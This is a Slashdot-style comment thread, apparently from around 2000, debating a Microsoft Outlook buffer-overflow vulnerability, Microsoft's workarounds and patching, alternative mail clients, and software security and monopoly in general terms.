First a disclaimer... I do believe that Microsoft showed very little insight when including scripting capabilities in their Emails. To this day I don't know a single person who uses this capability (except for virus writers). I am not an apologist for Microsoft, just looking to put this vulnerability into perspective. Regarding the buffer overflow... Is Microsoft software really more insecure than other vendor's software? Could it be that publicity and scrutiny just makes it seem that way (I don't see a [CNN, Slashdot, MSNBC] article every time pine,sendmail,imapd,etc. has a buffer overflow vulnerability). How would Netscape and Eudora fair under the same amount of scrutiny? Do other software companies just enojoy "Security through Obscurity"?

What to do until the fix is ready....

[redleg141]

M$ says you can download the latest IE to close the hole until the security fix it ready......

Let me think..... I can use Eudora to read my email or download IE 5.5 and risk my machine being screwed up even more.

I'm sticking with Eudora.

Re:What to do until the fix is ready....

[mdaniel]

Be careful, as some versions of Eudora use IE to render the message text (yes, even if you explicitly uncheck that option). If you can right click on your email and choose "View Source", you're in trouble.

Just a thought, but I agree with you - I also use Eudora.
-- /v\atthew

Re:Security certification needed?

[goodviking]

There is a definite tradeoff between software security and profit. To test a system to fail-safe levels requires a significant investment in time and resources that would eliminate any profit most firms would ever make on a product. The only projects that are really able to absorb these costs are mission critical projects in which the cost of failure is measured in human lives. For the rest of the projects out there, I have found that testing is the first thing to be jetisioned in the face of deadlines (and as we move to a RAD world, everything is done in the face of someone's deadline).

That said, I think that the idea is workable if it incorporates a sense of a graded scale that would imply security of the software engineering and testing process used by the company. Like the SEI, if you can document and demonstrate adherance to a certain set of processes, you can lable your product Level 2 or 3 certified. If defects are found in the deliverable product, you must be able to identify where the process broke down and how you plan to fix it to maintain your certification level. If you can't, your level gets revoked. That way, if you buy level 1 software and get burned, caveat emptor. If you buy level 5 software, you can have confidence that it's already been put through it's paces.

MS' update site is ... uh ... slashdotted?

[irongull]

Just booted into Windows for my afternoon UT session, and sure enough, that damn 'Windows Update' window pops up. But the update site is, well, I guess slashdotted is the wrong word ;-), but its definitely congested beyond usage. What am I supposed to do? That stupid update window has an incredibly annoying habit of popping up and totally screwing display and input while I'm running the flag back to my base, but I can't install the update 'cuz the site is screwed. I guess I'll just have to boot back into Linux and actually do some work...nah. Maybe its a good time to check if the nvidia drivers and OpenUT are working properly together.

And I don't even use Outloook. Grrrr.

Open Source and money

"That all changed in the late 70's when a young programmer actually had the audacity to sell his BASIC interpreter to the other programmers rather than just giving it and the source code for it away."

The audacity?? Let me get this straight, it is bad or wrong to try to make a business out something?? When I give my software away to people will those people, in return, provide a roof over my head or some food on my plate?? Until that starts happening don't ever criticize someone for trying to make money, no, let me rephrase, trying to make a living which is an underlying principle of this country. Capitalism did not invade this country, like a virus, 5 years ago. This country was BUILT on capitalism, ac

Until Jeff Lewis starts putting my kids through college he shouldn't have the audacity to criticize the act of selling software

So Eric Raymond - SO SHOVE IT.

Re:Its Time For Eudora

[BigBlockMopar]

so you are replacing one windows program with another windows program.... WHAT THE FUCK ARE YOU DOING ON SLASHDOT?

this site is for people smart enough to use linux.

Maybe he wants to learn how to install and use Linux, but he has to spend so much time administering Windows clients that he can't get around to it?

Applaud him for sparing the time to at least get away from Outlook, for which all the exploits seem to be well known.

Time was, and still is, my problem; even after five years of experience with UNIX as a user, learning administering my first Linux box is still quite an uphill battle.

However, you'll be pleased to note that I now type "ls -l" accidentally and frequently at DOS command prompts.

Go easy on the Linux newbie, for together, we will all be Bill Gates' demise.

Re:You should change your name to "sredmond"

[sredding]

I have not been trolled. I have not lost. Have a nice day.

M$ Liability

[otter42]

Just think, once UCITA gets passed in all 50 states, M$ won't even have to worry about it any more. Outlook Express will be _our_ problem.

Re:M$ Liability

[demon]

You mean, it isn't already?
_____

Re:MSNBC reports Microsoft Security Hole?

[Spankophile]

> I'll stick with ABC. World News Tonight is great, Nightline is excellent, and they're in league with Disney, not with the devil.

Disney is the devil

Yet another reason to shitcan Microsoft

[codefool]

'nug said.

H*ll yes

[Bostik]

Wouldn't big progam houses be interested in getting their applications branded "Secure" by a likewise trusted authority? (think CERT) My guess is yes. Microsoft, for example, would benefit (at least in large, mission critical installations) from having their source code audited and confirmed by a third party.

Unfortunately it wouldn't work. The big software companies are extremely reluctant to letting anyone outside their realm see the source code.

While it certainly would help to find these biggest holes, it is quite possible that the product code itself is so shoddy, so obfuscated to begin with, that even with enough time and knowledge, it is unsure if the audit would do any good. Probably the code has never been rewritten, but only new stuff has been added and old modified, to add some new functionality.

Isn't this how most of us write code, anyway?

What about Exchange?

[alumshubby]

Do any of these security exploits happen in Exchange? Every time an Outlook hole is revealed, we Exchange users also get the patches broadcast to us, but I don't remember hearing anything ever said about Exchange -- only Outlook, which will run on my work machine only after they fire me for refusing to have anything to do with it. :o)

Re:How long can they keep this up?

[Spankophile]

What!?!?

I'd rather find a security breach in a MS product and have them release a patch, then to find a breach in some free software and be told "Fix it yourself - that's the beauty of it."

Companies love the fact that they can hold MS responsible for their products. (Accountable to the market, if not the EULA).

A future error

[Veteran]

July 5th 2007 - Microsoft today reported a security hole in Windows 2005. The problem has only been detected in the "hi-security" version of Windows 2005, such as those used to control nuclear weapons.

Apparently when the clock rolled over to July 4th 2007, and the machine received any email with misspelled words, the machine will automatically post the password file for the system in plain text on usenet.

Microsoft spokesmen called the problem minor and expected to have a bug fix in place by August 2008.

Microsoft today sent the following email advisory to all of the affected machines. "To whom it may concern: Please do not allow your machine to receive an email with misspelled wurds."

Re:This one's EVEN better

[MrBogus]

There are various hacks to work around SFP, but the real problem is that Microsoft failed to include a mechanism to allow the administrator to turn off SFP on a file-by-file basis.

This may or may not have been intentional (you wouldn't want an installer turning off SFP), and it might be fixed in the future. I guess it just goes to show that you can't blow your foot off with a squirt gun.

This one's EVEN better

[zorgon]

I nearly drowned from beer inhalation when I learned about this ummm...feature from a friend whose firm is an early adopter of W2K. Not that the umm...feature itself existed (what sysadmin hasn't at one time or another wished for an umm...feature like this to protect hisorher systems from lusers), but that Solitaire was one of those protected system files you couldn't delete without it being resurrected. I was ROTFLABBTMN when I heard that.

WWJD -- What Would Jimi Do?

Re:This one's EVEN better

[slycer]

Actually.. as long as you trash the file where it is pulling it's clean files from - it's easy enough to get rid of whatever you want..

The files are in a hidden folder c:\winnt\system32\dllcache
Get rid of something in there, then you can delete the file that it is supposed to be backing up.

Yes, sol.exe is in that directory - bizarre

Just to be fair here...

[kiscica]

This bug is a standard buffer overflow vulnerability, an accident, and not a design bug like automatic or near automatic execution of executable mail content (sheesh), responsible for the previous mail worms and viruses. I do not want to be seen as defending Microsoft's practices, their ideals, or their bad program designs (e.g. aforementioned executable mail content). HOWEVER, a buffer overrun bug like this is not an inherent misfeature of Microsoft's design. It's a bug plain and simple, and furthermore one that has affected and continues to affect many, many Unix programs. This could have happened to "us", in other words. (If there were a buffer overrun problem in fetchmail, for example -- there isn't, but suppose there were.) We can and should rail at Microsoft for designing in weaknesses like that which made the ILOVEYOU fiasco possible. With a buffer overflow problem, I think that the "may he who is without sin cast the first stone" principle must apply. One of their anonymous programmers made a serious mistake. Same mistake has been made, over and over, in virtually every Unix system daemon since the Epoch. They get fixed (with an alacrity usually proportional to the consequences of an exploit) and that's that. And though I passionately believe in Open Source, please note that the fact that the source for most of those daemons has been examined by thousands and thousands of people, they never got fixed all at once. For example, -every- Red Hat Linux distribution in memory has fixed some buffer overruns and introduced others.... kiscica

Re:Just to be fair here...

[kiscica]

Oh, I quite agree that this bug is extremely disturbing. It is potentially much more dangerous than the "executable attachment" problem since it can be exploited without the user having to do anything stupid first (I will resist adding "other than choose to use Outlook in the first place"). I certainly did not mean to imply in my original post that I am not disturbed by it. If I or anyone I knew used Outlook I would be tripping over myself right now to make sure it was not running, automatically checking every five or ten minutes a mail spool that, at any moment, could receive a message prefaced with the Header of Death.
I just think that the blame for buffer-overrun vulnerabilities is spread very thin right now, in the sense that thousands and thousands of programmers all over the world are still writing sloppy code, under Unix as well as Windows, that fails to do appropriate bounds-checking. The designers of language libraries and perhaps even OS and hardware designers share, to some extent, some responsibility for this problem.
Buffer overrun has been a well-known attack channel for -decades-. I distinctly remember writing exploits to get root on BSD vaxen back in the mid-eighties. We didn't think twice about it, and it was well-known then. rtm's worm used the same bug, a couple of years later.
All hackers need to wise up about this (and library, language, and OS designers need to make it easy to avoid the error and difficult, or impossible, to commit it). I totally agree that this particular case is a bug with frightening potential consequences. I just don't think it has much to do with Microsoft per se.
Disclaimer: I rarely use Microsoft products (although I do happen to be posting this very message from a machine running Internet Exploiter!) and have little regard for them.
kiscica

Re:Just to be fair here...

[Felinoid]

Microsoft has such a department and uses it to market how Microsoft is better than Linux.
"We have have profesionals checking our code"
Yet those profesionals miss the kind of bugs any hobby coder would catch.

This isn't even a "many eyes" issue it is purely an issue of a flawed develupment process internal to Microsoft and found no place else.

Re:Just to be fair here...

[Felinoid]

>Of course, it is true that this is simply a bug, and it could have happened to anyone. But it didn't happen to anyone, it happened to Microsoft, and they deserve some measure of condemnation for it.

Anyone who introduces a defect deserves some amount of ribbing for it.
The more people trust the code the more they desevre the ribbing...
Note I said "Trust" not "Use" or "made to use".
Microsoft catches hell for bad code enough to cover any given bug found.
And no one accually trusts Microsofts code... or if they do they deserve what they get.

I think Microsoft should catch it for an "it could NEVER happen here" addatude they keep pushing.

This is the kind of bug a collage student makes.
But... being a profesional programmer dosn't preclude the defect. It happends becouse it slips our minds at the moment we are writing code.
It hasn't happend to me yet... but quite a few times I ALLMOST released code with such a bug.

Re:Just to be fair here...

[Tony-A]

What reason would I have to believe that this (or is it two of them now?) is the last one, or the one with my name on it? Somehow I think I'm better off not applying the patches and know that I am not safe.

Re:Just to be fair here...

[Tony-A]

Right on. The OS and standard utilities give a pervasive impression of how good things ought to be. I think Microsoft may have set us back a couple of generations.

Re:Just to be fair here...

[jafac]

No, it IS a big deal, because given the opportunity to fix it, Microsoft did not.

And on the tail of several serious other exploits, which Microsoft DENIED were bugs, but instead insisted were valuable, necessary features (like the fucking bullshit SHS thing).

This isn't a case of "he who has not sinned cast the first stone". This is the case of a marketing department making engineering decisions that adversely affects hundreds of millions of people across the world. And laughing all the way to the bank.

if it ain't broke, then fix it 'till it is!

Re:Just to be fair here...

[AdrianG]

All this is true, but doesn't it seem like MS sets an awfully bad example when it comes to writing OS's and applications? When budding young programmers grow up in an environment where good programming practices are routinely sacrificed for time to market and other more questionable goals, isn't it easy to imagine these programmers getting out of the habit of thinking very much about the consequences of their coding shortcuts?

Just a thought.

Adrian

Re:Just to be fair here...

[jesterzog]

It isn't so much that there's a bug that concerns me, it's that it took this long for anyone to pick it up. The bug has been in every version of Outlook, and that's been around for quite a long time now.

In the end it was discovered by an independent entity, and considering that Microsoft doesn't traditionally open their development to outsiders, they have no control (directly or through probability) of who that entity might be. If it wasn't a security firm that discovered this first, it could have been anyone.

IMHO, they should instead have an internal infrastructure to find these things for them before anyone else can. People trust Microsoft to provide them with secure products, yet Microsoft is at least partly relying on the users to find the security holes.

===

Re:Just to be fair here...

[Black+Parrot]

> This could have happened to ?us?

The difference being, whenever it happens to "?us?", by the time the story reaches /. the only interesting question remaining is

Did you install the patch, or watch Baywatch instead?

--

Re:It's about time

[scorbett]

> Why is this the first internet virus
> that someone with a brain could
> actually fall for?

People "with a brain" wouldn't be using such a horribly insecure mail client in the first place. There's a reason you don't hear about exploits like this affecting users of other mail clients such as Netscape Messenger (for example).

This security hole could potentially become a nightmare, but only to those people who use Microsoft's inferior mail software. Microsoft has set back computer security by years. Take these old pieces of virus protection advice:

• You can't get a virus simply by reading a message - not true anymore, thanks to Microsoft.
• Viruses cannot be contained in plain text messages - also not true anymore, thanks to Microsoft's Windows Scripting Host and lame VBA viruses such as I LOVE YOU.
• Virsuses cannot be contained in image files, sound files, video clips, or other file formats, only executable binaries - still technically true, but thanks to Microsoft's "hide extensions of known types" feature, you can see viruses like "innocent_file.jpg.vbs", which appears in Microsoft clients as "innocent_file.jpg". Launching this file will, of course, trigger the virus.

Microsoft needs to admit that Outlook is fatally flawed. Since this will never happen, it's up to people like you and me to educate and inform anyone and everyone. Companies that mandate the use of Outlook or Outlook Express (I used to work for such a company) especially need to be educated.

--

Important Exception

[sulli]

The Microsoft website pointed out that if you only use Microsoft Exchange Server, you're NOT affected. It only affects users of Outlook who get mail via POP3/IMAP4.

The specifics from Microsoft:

How can I tell if I'm vulnerable to this issue? If any of the following apply to you, you are not affected by this vulnerability:

You are running a default installation of Internet Explorer 5.01 Service Pack 1.
You are running a default installation of Internet Explorer 5.5 on any system except Windows 2000.
You are using Outlook and it's configured to use only MAPI

If none of the above apply to you, you are affected by the vulnerability.

So the very good news is that many or most corporate users (who were highly susceptible to ILOVEYOU and related worms) will NOT be affected by this exploit. However, home, small biz, and corporate users who are using a POP3/IMAP server (or an ISP) for mail are vulnerable, and certainly everyone should upgrade when the fix is made available.

sulli

Re:Important Exception

[thimo]

That list is what is bugging me. Is MS really that arrogant (don't answer! :)? So, if I check the list (Running IE 5.0, not running Outlook on MAPI), I conclude that I'm affected. But how are they going to exploit my Lotus Notes (sorry, I'm at work) here or even my Netscape/Mutt at home? Duh!!! But then again, maybe I missed a line in the article that mentioned you *have* te be running Outlook te be in a position to be affected...

Thimo
--

Re:Security certification needed?

[alexpage]

Wouldn't big progam houses be interested in getting their applications branded "Secure" by a likewise trusted authority? (think CERT)

However, setting up such an authority would be incredibly difficult. There are very few people in this world who understand enough Formal Methods and Predicate Calculus to be able to stringently examine and mathematically prove code.

Hence these people would be able to charge a fortune, putting the service out of the budget of all but the biggest companies. Even then, the sheer amount of time, even with computer-assisted methods, to examine the code of your average Microsoft bloatware would add months or even years to release dates. I can't see a company being interested in that.

Who cares? I mena if you still use outlook...

after hearing about all the shit its vulnerable to, then you're just stupid for continuing to use it. I can't believe Microsoft gets none of the blame by the press.

It's precisely because MS is a monopoly that people just accept the cruddy software. They don't switch because there is no alternative or it would be too costly (== MS has us locked in).

And this does not mean that crackers deserve no blame either nor am I "giving the green light" to the wannabe virus writers, but get a clue, MS is building products by welding old guns and bombs together. You don't exactly place *all* blame on someone who figures out a way to make the whole product blow up. Both sides need to share the blame, publically.

Re:MSNBC reports Microsoft Security Hole?

[kableh]

The article says that they learned about the vulnerability on July 1st, but hadn't released information on it, and weren't going to until a patch was available...

Is your Outlook vulnerable?

[ras_b]

to check if your outlook settings are safe (info from this web site):

First, verify that Outlook is configured to use MAPI. To do this, open Outlook, then select "About Microsoft Outlook" from the Help menu. If the second line in the resulting dialogue box says "Corporate or Workgroup", you're using MAPI.

Next, verify that Outlook isn't configured to use POP3 or IMAP4. Go to the Tools menu in Outlook, then select Services. If "Internet E-mail" is not listed among the services, you are running only MAPI, and are not affected by this vulnerability.

Re:Bugtraq

[jovlinger]

we were amused, but out of points. Sorry.

MSNBC TV

[latro]

I saw this on MSNBC tv the other day and it just got me thinking about how irresponsible their reporting is on this issue, and how they are so proud of the fact that they are such an honest news organization that they can report fairly on problems caused by their own business partner.

Ok, so of course they are partners with Microsoft, but how can anyone take their "news" seriously if they fail to indicate that there are other ways to fix the problem other than installing countless patches. There was an NBC reporter talking to the MSNBC host about the issue, and the reporter said that his close contacts at Redmond assured him a fix was already on the way! Whew, now I'm safe. The host did make it clear that this only affected MICROSOFT OUTLOOK, and they did state clearly that Microsoft was their partner, but the reporter then went on to say in response to this that Outlook or OE were on 3/4 of the worlds computers, so really, the sw patches were the only way to go.

Couldn't he at least have mentioned the possibility of using a different e-mail program? Of course not! But for home users, this is probably the most efficient solution - why bother keeping up with all these problems and patches if you can just install Eudora and avoid the whole issue! Irresponsible of them not to mention this. Not surprising, of course, but irresponsible.

-------

Re:MSNBC reports Microsoft Security Hole?

[BigBlockMopar]

I had hoped that NBC would retain its journalistic integrity, even when partnering with Satan, but it looks like they're under the control of Billy Boy. Sigh, one less news source to trust.

Journalistic integrity at NBC? I don't think so. Dateline NBC is almost as sensationalist as Extra or any of the other video editions of supermarket tabloids.

With the MSNBC partnership, I feel I can trust their reporting of Microsoft news about as well as I can trust the CBC's reporting of the state of the Canadian federal government.

Never leave the fox guarding the henhouse.

I'll stick with ABC. World News Tonight is great, Nightline is excellent, and they're in league with Disney, not with the devil.

Re:Anyone notice this one?

[TheShrike]

Yep, you bet I noticed it. I submitted it as an article yesterday, but apparently, MS Security holes are news only on odd-numbered days of the week.

Re:MSNBC reports Microsoft Security Hole?

[BigBlockMopar]

I'll stick with ABC. World News Tonight is great, Nightline is excellent, and they're in league with Disney, not with the devil.

Disney is the devil

Hahaha... Well, getting back to NBC for a second, I'm a Will & Grace fan. Sorry.

Outlook Express required to fix?

[|DaBuzz|]

This annoys me:

A non-default installation of IE 5.01 SP1 or IE 5.5 also will eliminate this vulnerability, as long as an installation method is chosen that installs upgraded Outlook Express components.

The *REASON* I did a non-default installed of IE 5.5 was so I could EXCLUDE Outlook Express because I use Outlook 2000. So basically MS's Internet software is so "integrated" that you can't have one be patched for security reasons without installing all of them ... even if that means redundant email clients wasting space.

I could care less if Microsoft is a monopoly ... this bundling/tying/integration crap must stop for exactly this freakin reason! It's like if one part of the system is insecure, it makes ALMOST ALL OTHER MS APPS vulnerable. Anyone with half a brain can see the implications of this sort of methodology to software development. So the question is, who has Microsoft's half brain?

blarg.

Re:Outlook Express required to fix?

[The+Man]

I could care less if Microsoft is a monopoly ... this bundling/tying/integration crap must stop for exactly this freakin reason!

It is your attitude that allows them to engage in monopolistic business practices. If you don't like their products - and it's obvious that you have serious issues with them - then instead of whining about it on /. just stop doing business with Microsoft. It's really just that simple. Corporate profit whores are the easiest entities in the world to manipulate. All you have to do to change their ways is to choke off their profits.

If you stick a fork in your eye, I will neither help you get it out nor sympathize with you; you stuck it in there and it's your own damn fault. Using Microsoft products is the same way. Anyone who does so is just asking for problems. I'm not claiming nobody else's products have flaws, only that Microsoft's have many more flaws than anyone else's, and as you mention their fundamental strategy merely worsens the situation. If you use them, you deserve what you get.

Finally, I end virtually every post this way: if your employer "forces" you to use this stuff, just remember that in most countries you can always quit. So either stop whining about it or quit your job and go work elsewhere. "Whoring: Just don't do it!"

Re:Outlook Express required to fix?

[tftp]

if your employer "forces" you to use this stuff, just remember that in most countries you can always quit

Another way is to avoid Lookout, IE, MediaPlayer and any other apps that you don't like or don't trust. Got a special accounting package or an expensive PCB design tool? Fine, run it. Most likely PADS won't be handling your mail.

However Internet software is available in all shapes and forms, from Pine to all those GUI mail clients. Try Netscape or Opera or Lynx... there is a choice.

So even if you have to run Windows, most harm comes not from OS kernel but from user apps. Choose them wisely and be happy.

Re:Outlook Express required to fix?

[jafac]

okay, can we say "Findings of Fact?" I knew you could.

This bullshit attitude that we have a choice in the matter has been proven FALSE in a court of law.

Microsoft has illegally driven competitors from the marketplace. There is no choice.

if it ain't broke, then fix it 'till it is!

Re:Outlook Express required to fix?

[goon]

...It is your attitude that allows them to engage in monopolistic business practices. If you don't like their products - and it's obvious that you have serious issues with them - then instead of whining about it on /. just stop doing business with Microsoft...

I wish things could be that simple. I'm currently setting up some machines for my folks. when I suggested an OS other than MS, they requested Windows not because of the OS but the application software they want to run on it (in this case accounting software.) The alternatives on Linux for example are not an option as we (.au) have recently implemented GST (goods and sales tax). As there is no *nix port of their software (MYOB), they have no choice. Though I have heard mumbles of a Linux port on my local LUG.

Re:Outlook Express required to fix?

[|DaBuzz|]

Finally, I end virtually every post this way: if your employer "forces" you to use this stuff, just remember that in most countries you can always quit.

So you're suggestion is that I should up and QUIT my chosen profession which happens to be a PDA and Mobile electronics analyst where I'm senior editor of a *very large* site devoted to the subject. A site that is my *full time job* where 99% of the products and services we cover have direct ties to the most popular PIM on earth, Outlook 97/98/2000.

Yeah, I'll just up and quit because you've convinced me that Microsoft's integration that requires components of software packages that you DO NOT WANT just to fix a security problem is all my fault, you're a brilliant man ... I've always wanted to pump gas for a living anyway, I guess it's better than "whoring".

(If only life were as simple as the self indulgent zealots try make it seem.)

Re:Outlook Express required to fix?

[The+Man]

There is no choice.

Rubbish. I don't use anything from Microsoft, and haven't for at least 4 years. You and everyone can do the same. Fact is, most people don't care enough about the issue to do the necessary investigation to take this step.

The suit against Microsoft is tripe and nonsense. The only way anyone can have a monopoly is if people choose - yes, choose - to do business with them. Sorry, you lose on this one because the argument is irrefutable. No business, no profits, no market share. There is a choice. There is always a choice.

Whoring: just don't do it.

Re:Outlook Express required to fix?

[The+Man]

So you're suggestion is that I should up and QUIT my chosen profession which happens to be a PDA and Mobile electronics analyst where I'm senior editor of a *very large* site devoted to the subject. A site that is my *full time job* where 99% of the products and services we cover have direct ties to the most popular PIM on earth, Outlook 97/98/2000.

I'm suggesting that you have a choice. That "my employer forces me to" is a whine and a cop-out, not a valid excuse. If you choose to work for them, you make a choice. Nobody is forcing you to do anything. So what I'm suggesting is that you have roughly three choices: a) change your company's direction, b) not complain about Microsoft because you are keeping them in business, or c) quit and do something else.

Quite frankly, I don't care which you choose. It doesn't affect me either way. BTW, you aren't impressing me with your title and so forth. If you don't like Microsoft, you are a whore for doing that job. Accept it along with your Lexus and your trophy wife. I'm not trying to bait you. I'm trying to show you that what you see as a "practical" decision, or maybe not a decision at all, is in fact a conscious disregard for whatever values you may have in exchange for money.

I make a nice living too. I just don't sell out for it. There is no Microsoft in my life, nor will there ever be. I don't intend to pump gas, but if that's my only choice, I'll gladly take it.

Whoring: Just don't do it.

Re:Outlook Express required to fix?

[The+Man]

I wish things could be that simple.

Then you failed to grasp the whole point of the post. It really is just that simple.

Whoring: Just don't do it.

Re:MSNBC reports Microsoft Security Hole?

[bakreule]

It's good to see that a Microsoft owned news service can still cover security bugs in Microsoft products.

Hmm.. I wonder.....

"The only defense against the vulnerability is installing the Microsoft patch, which will be available shortly on the Microsoft.com security Web site.

How about not using Outlook? I also love the "Microsoft profits top Street forecasts" link in the middle, when in fact MSFT stock has plummeted today (5.25 points as of this time).

I had hoped that NBC would retain its journalistic integrity, even when partnering with Satan, but it looks like they're under the control of Billy Boy. Sigh, one less news source to trust.

Someone else said this, but I REALLY love the "you can fix this now by installing IE 5.5!!!". Really makes you wonder, and I'm not a conspiracy freak.......

I wonder if MS has spent the time since June (when the article said they found out about it) fixing the bug, or if they've spent it all figuring out how to exploit it and get people to dl IE5.5

That brings up another question. The article specifically says that people can protect themselves "immdediately" by downloading IE5.5. So did MS know all along about this bug? What could be possibly be in IE5.5 that would fix an Outlook bug? Exactly how long did they know about this? And for the conspiracy people, did MS create this bug to exploit at a future date? How much of this is a geniune "Damn, let's fix this bug!".....

Let's forward all of this to the Justice Dept. I think they really should have the members of /. on their advising panel.

Re:How long can they keep this up?

[cyber-vandal]

Point me to a URL where Microsoft were 'held accountable' for their software not working properly by a large corporation. The truth is that the EULA has recently been upheld in a court of law by a company that lost $1.5M due to a company's poor software, so you are dependent on MS to be bothered to fix a problem. With OSS you can hire someone to do it for you, or you can inform the author who 99 times out a hundred will fix it for you.
Accountable to the market is a hilarious statement. The people that choose the software are rarely the ones that have to work with it, they're the ones making IT staff work extra hours to get the damn thing in.

Re:Bugtraq

[dAzED1]

We use Lotus Notes (yuck!) here, so I don't mind educating people on this new hole (I've never heard of any LN exploit) yuck, eh? Do you see how in this one sentence you've said something rather strange? You don't know of any exploits with lotus notes, yet you don't like the product. hmmm...strange

Planned fix

[dagoalieman]

In an email from our IT division that I recieved recently, I read that SANS hopes to be using a "virus" email patch- a virus email that exploits the problem to quietly patch it.

Neat idea, using a virus to fix it and stop others, if it works...

Below is the email I recieved from our IT (via SANS):

>I am forwarding this note to you as a FLASH because the vulnerability
>it describes is probably the most dangerous programming error in Windows
>workstation (all varieties -- 95, 98, 2000, NT 4.0) that Microsoft has
>made.
>
>You are vulnerable to total compromise simply by previewing or reading
>an email (without opening any attachments) if you have one of the
>affected operating systems and have the following installed:
>* Microsoft Access 97 or 2000
>* Internet Explorer 4.0 or higher, including 5.5 (Windows 2000 includes
> IE 5
>
>SANS Prize: It may be possible to fix this vulnerability automatically,
>via an email without asking every user to take action. The concept is
>similar to using a slightly modified version of a virus to provide
>immunity against infection. SANS is offering a $500 prize (and a few
>minutes of fame) to the first person who sends us a practical automated
>solution that companies can use, quickly, easily, and (relatively)
>painlessly to protect all vulnerable systems.

Re:sorry but , no

[mangino]

This is absolutely and completely false. Almost every buffer overflow is exploitable. All you do is to overwrite the memory space with code to execute. The key is to overwrite the return address to that of your custom code, that way, when the function returns, it actually jumps into your code. This can be done with eudora, or pegauses, or anything else. They key is that the message you use to overflow the buffer must contain executable code.

There is nothing that says overflow... execute all commands after as superuser, all commands are executed as the regular user. The problem with windows is that there isn't a good distinction. Root Exploits typicaly come from programs running as root or setuid root. That is why people recommend that you drop priveleges ASAP and run as much as possible in a chroot jail.

There are actually several things you can do to fix this, the easiest one is to make the stack non executable. There are some patches from Solar Designer for Linux that do just that. Linux, unfortunately, likes to use the stack as a place to execute signal handling code.
--
Mike Mangino
Sr. Software Engineer, SubmitOrder.com

Can we say "Lotus Notes?"

[zookie]

Most anyone involved in choosing a LARGE enterprise mail system will look at both Microsoft Exchange and Lotus Notes. On a point-by-point comparison, Notes is just as competitive as Exchange (yes, even with calendaring and scheduling). Hell, it wasn't until the last couple of years that Exchange was even a competitor to Notes.

I'm not saying Notes is perfect, but to imply that Microsoft is the only game in town is far from the truth.

Re:Can we say "Lotus Notes?"

[NetJunkie]

I'll agree with that. Notes has a lot of good things going for it. But, having used the Notes client it just isn't as good as OutLook. The backend stuff is nice but the front end isn't.

Re:Bugtraq

[MostlyHarmless]

Although that's an important security hole in its own right, it's not the one we're talking about in the article. The article involves a buffer overflow in the date field, not an oops when executing ActiveX objects that are databases.

Re:Just publishing a patch isn't going to fix this

[jbrw]

Win98 has an optional feature that will periodically contact Microsoft when you're connected to the internet to download a list of updates/patches, etc. Apparently no information is sent to Microsoft. All very similar to Helix Gnome.

Ofcourse, OS/2 was doing this in about '94 (via gopher rather than http, if I remember correctly).

...j

Viruses and genetic code

[mrogers]

Now if I was evil I might see this as an opportunity to make a large-scale test of genetic algorithms. The code would email imperfect copies of itself to everyone in the user's inbox. Most mutations would just ruin the virus and crash the recipient's copy of Outlook, but some might result in improvements (self-encrypting code, etc). Variety would make it much harder to identify infected emails, so even "junk DNA" which was not executed could be useful.

$ cat < /dev/mouse

sorry but , no

[Lumpy]

This is only a problem with "feature Jammed" software. Most email clients will not run attachments, or any code in an email message, it happens that only microsoft, right now, had the stupid idea of doing this. if you buffer overflow eudora or pegasus it just dies. kinda like Pine... it dies (or core dumps) they dont go (overflow.... execute all commands after this as superuser).

I wish there was more detailed info on this exploit.

Re:My favorite line in the article

[photon317]

Also, notice on the main security page that the ordering of the security bulletin numbers don't line up with the published dates. This seems like hard evidence that they don't inform their customers of these security problems quickly in the order received, but rather whenever they finally get around to having some half-answer (which will be days after bugtraq and the like have eaten it up).

Re:Swiss cheezzz

[skinnymofo]

^=U hey, AC do you know what anal retentive means??

Re:Bugtraq

[Chalst]

This has nothing to do with by design security flaws. It's a worm that propagates using a buffer overflow: just like the countless UNIX worms.

Outlook Express eh?

[/Idiot\]

this one always makes me giggle... Why is it that Outlook Exprs and Outlook share the same name but not a line of code? And then why is it that MSDE came from the SQL7 code but it's not called SQL Anything?
Wouldn't it be better to call Outlook xprs "Just a mail client2000" and MSDE "not quite a database engine2000" :)

It's not about Suckage, it's about Security.

[Tildedot]

You said:

I'd like to see all the "MS SUCKS!!!" people in here sit down and write an app that does everything OutLook can do. Yes, it has its problems but you can patch it, just like everything else. Until there is another alternative, even a close one, people won't switch.

Newsflash: Some Companies Don't Use Outlook.

We don't. Why is that? Is it because we have a single app that does everything Outlook can do? No. Did management like it's scheduling? Yeah, they were impressed. But, I wan't hired to point, click, giggle, and approve everything Management wants to run. It's part of my job to build viable systems for my company. So, before we pop for a system, we audit the crap out of it: Outlook/Exchange doesn't even come close to cutting it, "features" or not.

See, we have a different view on the Web. An example: Since our first purchase of bsafe licenses from RSA labs, some 5 year years ago, we've run a secure inter- and intra-net for our clients and employees. Scheduling, Calendars, Mail, Document Sharing/Transfer, Routing, Storage, Directory Services, some B2B and Timesheets, Printing and PDF generation from Word Documents and Faxes.

As for bugs; well, we're always in development :^) We've had several minor security issues, some early ones were, like this, bounding checks that didn't. Some memory leaks in 3rd party libraries. A few browser issues. Harmless stuff. Never whacked a file, or accessed secure information without the consent of the user. Never. As lead developer, I can honestly claim that our product easily does more than Outlook, and is virtually browser independent (SSL the only requirement). (Of course, you could just shitcan my comment, because it's a Server app, and not a Win client app, and we don't sell it, and..and...:)

Anyway, I can walk the walk. So, let's talk the talk.

There is no excuse for shoddy code and poor design at the Enterprise level. None. There are tons of relatively inexpensive tools that take care of beginner mistakes (like bound checking) for you, and may I remind you Microsoft should not be a beginner. Where are the coding wizards that bloated the Doom egg into Excel? And don't even start to winge to me about "so many lines of code crap", either. I don't care how many lines you bloat into a product: if the design is poor, you're in for the big lose. And, make no mistake about it, the VBScript security concept is simply Nonexistent. A pathetic afterthought -- a late-night crapfest of coding that makes the I_Love_You virus read like Shakespeare.

To make matters worse, Microsoft leveraged the farm on the VB Concept. Every "application" has a backdoor^h^h^h(Screw it, it's a backdoor) propped open wider than than the fridge at an "All-you-can-drink" Mardi Gras party in the Big Easy.

Uh...Wait...My Spidey Senses are telling me that the party line at Microsoft is that all this scriptability is The Big Win for productivity! Really!! You can cut/paste/drag/drop/bone/fillet/chop bits between all your apps! Isn't that exciting? Huh? Don't you want to be able to execute arbitrary code from an Excel spreadsheet, popped open by an untrusted 3rd party .OCX, driven by an Access 02 database automagically opened in Word?!? MmmmBoy!!! Smell That Innovation!

